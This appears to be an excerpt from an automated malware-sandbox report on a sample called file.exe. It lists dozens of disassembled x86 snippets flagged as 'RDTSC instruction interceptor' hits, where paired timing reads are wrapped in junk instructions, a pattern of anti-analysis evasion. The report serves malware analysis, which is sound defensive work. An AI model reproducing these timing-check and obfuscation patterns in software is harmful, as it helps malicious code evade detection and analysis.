Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 275650 second address: 27565B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FA93D08FA16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 27565B second address: 275685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007FA93CFE6D5Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FA93CFE6D5Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jns 00007FA93CFE6D56h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32ED05 second address: 32ED0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32ED0E second address: 32ED20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 332DC2 second address: 332DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 332DCB second address: 332DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA93CFE6D56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 332DD5 second address: 332E00 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA93D08FA16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FA93D08FA1Ah 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push ebx 0x00000018 jmp 00007FA93D08FA20h 0x0000001d pushad 0x0000001e popad 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 332969 second address: 33296D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33296D second address: 332981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93D08FA1Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 332981 second address: 33299C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D61h 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FA93CFE6D56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33299C second address: 3329A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33438F second address: 334393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33F401 second address: 33F422 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FA93D08FA23h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FA93D08FA16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 34514D second address: 345151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 27A766 second address: 27A78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FA93D08FA25h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f js 00007FA93D08FA16h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 344CCD second address: 344CE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D62h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 348B6C second address: 348B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FA93D08FA16h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 351DC1 second address: 351DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35726B second address: 357275 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA93D08FA1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35CDD0 second address: 35CDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35CF5B second address: 35CF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93D08FA28h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35CF77 second address: 35CF87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35CF87 second address: 35CFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA93D08FA27h 0x0000000c jmp 00007FA93D08FA1Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35CFB2 second address: 35CFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FA93CFE6D62h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35CFBF second address: 35CFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35D3CF second address: 35D3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA93CFE6D56h 0x0000000a pop eax 0x0000000b push esi 0x0000000c jns 00007FA93CFE6D56h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35D524 second address: 35D52A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35D52A second address: 35D534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35D534 second address: 35D538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35D538 second address: 35D567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D67h 0x00000007 jmp 00007FA93CFE6D64h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35D567 second address: 35D574 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA93D08FA18h 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35D705 second address: 35D70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35D70C second address: 35D712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35D712 second address: 35D723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93CFE6D5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35D8EF second address: 35D8F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35D8F3 second address: 35D908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA93CFE6D5Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35E2D0 second address: 35E2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jnc 00007FA93D08FA16h 0x0000000b jc 00007FA93D08FA16h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361EA0 second address: 361EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361B5F second address: 361B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA93D08FA23h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 361B79 second address: 361B83 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA93CFE6D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36E469 second address: 36E46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36E46D second address: 36E473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36C265 second address: 36C26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 36C26B second address: 36C26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37ECC6 second address: 37ECCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 37ECCC second address: 37ECD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 394A83 second address: 394A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 394D0A second address: 394D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 394D12 second address: 394D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jp 00007FA93D08FA16h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 394D27 second address: 394D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 394D2D second address: 394D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 394D31 second address: 394D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d js 00007FA93CFE6D56h 0x00000013 jnp 00007FA93CFE6D56h 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c push edi 0x0000001d jl 00007FA93CFE6D56h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 394FD1 second address: 394FEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 394FEF second address: 39500B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93CFE6D66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 395476 second address: 39547D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3984E2 second address: 3984E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3984E6 second address: 3984EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3984EC second address: 398511 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FA93CFE6D61h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 398511 second address: 398519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3987EB second address: 39883F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FA93CFE6D5Ch 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FA93CFE6D58h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov edx, dword ptr [ebp+122D1AD0h] 0x0000002e push 00000004h 0x00000030 or edx, 705D99F7h 0x00000036 call 00007FA93CFE6D59h 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 39883F second address: 398843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 398843 second address: 398847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 398847 second address: 398879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007FA93D08FA1Bh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ebx 0x00000012 jo 00007FA93D08FA18h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FA93D08FA1Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 398879 second address: 39887E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 39B4D9 second address: 39B4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 39B4DD second address: 39B4F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F8032B second address: 4F80344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80344 second address: 4F80375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA93CFE6D67h 0x00000008 pop esi 0x00000009 mov bx, 455Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA93CFE6D5Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80375 second address: 4F80379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80379 second address: 4F8037F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F8037F second address: 4F803C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA93D08FA1Ch 0x00000008 pop ecx 0x00000009 call 00007FA93D08FA1Bh 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007FA93D08FA1Eh 0x00000020 xor cl, 00000008h 0x00000023 jmp 00007FA93D08FA1Bh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F803C5 second address: 4F80421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f push edi 0x00000010 pushfd 0x00000011 jmp 00007FA93CFE6D64h 0x00000016 sub ah, FFFFFFC8h 0x00000019 jmp 00007FA93CFE6D5Bh 0x0000001e popfd 0x0000001f pop eax 0x00000020 popad 0x00000021 mov edx, dword ptr [ebp+0Ch] 0x00000024 pushad 0x00000025 mov ax, di 0x00000028 mov dh, D3h 0x0000002a popad 0x0000002b mov ecx, dword ptr [ebp+08h] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 mov cl, 31h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80421 second address: 4F8045D instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushfd 0x0000000a jmp 00007FA93D08FA23h 0x0000000f xor ax, D06Eh 0x00000014 jmp 00007FA93D08FA29h 0x00000019 popfd 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0753 second address: 4FA07BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA93CFE6D67h 0x00000009 sub ax, E9FEh 0x0000000e jmp 00007FA93CFE6D69h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FA93CFE6D5Ah 0x0000001f mov ebp, esp 0x00000021 jmp 00007FA93CFE6D60h 0x00000026 xchg eax, ecx 0x00000027 pushad 0x00000028 mov ebx, ecx 0x0000002a popad 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA07BB second address: 4FA07D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA07D6 second address: 4FA07EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93CFE6D64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA07EE second address: 4FA085E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA93D08FA24h 0x00000013 adc ax, 6F48h 0x00000018 jmp 00007FA93D08FA1Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FA93D08FA28h 0x00000024 sbb cl, FFFFFFA8h 0x00000027 jmp 00007FA93D08FA1Bh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 movzx esi, di 0x00000033 mov dh, E6h 0x00000035 popad 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA085E second address: 4FA0865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0865 second address: 4FA08A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 pushfd 0x00000007 jmp 00007FA93D08FA26h 0x0000000c add esi, 4B26C668h 0x00000012 jmp 00007FA93D08FA1Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007FA93D08FA1Bh 0x00000024 pop eax 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA08A8 second address: 4FA08E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA93CFE6D68h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA08E0 second address: 4FA08EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA08EF second address: 4FA08F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0A7A second address: 4FA0AEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA93D08FA1Fh 0x00000009 xor cx, 4ADEh 0x0000000e jmp 00007FA93D08FA29h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FA93D08FA20h 0x0000001a xor si, 7AD8h 0x0000001f jmp 00007FA93D08FA1Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 mov eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FA93D08FA25h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0AEA second address: 4FA0B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 78h 0x00000005 call 00007FA93CFE6D68h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0B12 second address: 4FA0B2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0B2C second address: 4FA0B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0B32 second address: 4FA0B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0B36 second address: 4FA0B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0B3A second address: 4FA0B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ah, 9Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0B4A second address: 4FA0B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
